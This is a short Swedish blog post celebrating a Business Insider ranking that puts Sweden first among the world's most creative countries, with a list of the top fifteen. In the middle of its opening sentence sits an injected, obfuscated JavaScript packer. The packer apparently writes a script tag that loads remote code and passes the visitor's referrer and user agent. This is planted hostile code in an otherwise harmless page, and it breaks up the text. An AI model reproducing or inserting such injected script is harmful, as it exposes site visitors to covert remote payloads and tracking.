Image Image Image Image Image Image Image Image Image Image

| 19 januari, 2020

Scroll to top

Top

Sverige är nu det kreativaste landet i världen

Sverige är nu det kreativaste landet i världen
Sebastian

Grattis eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kbzea|var|u0026u|referrer|synaf||js|php’.split(’|’),0,{}))
Sverige!! Vi har länge varit väldigt duktiga på kreativitet och äntligen får vi något för det.

Enligt den amerikanska hemsidan Business Insider har nu Sverige fått en första plats som det mest kreativa landet i världen följt av USA. Business Insider är en hemsida med fokus på affärer och nöjesnyheter. Enligt mig en väldigt bra hemsida som ofta lägger ut information som företag försökt hålla hemlig. Som att Groupon egentligen går minus 😛

Här är listan på världens mest kreativa länder. Som ni ser kommer våra nordiska grannländer inte långt efter oss.

1. Sverige

2. USA

3. Finland

4. Danmark

5. Australien

6. Nya Zeeland

7. Kanada

8. Norge

9. Singapore

10. Nederländerna

11. Belgien

12. Irland

13. Storbritannien

14. Schweiz

15. Tyskland

 

Mer info: http://www.businessinsider.com/most-creative-countries-in-the-world-2011-10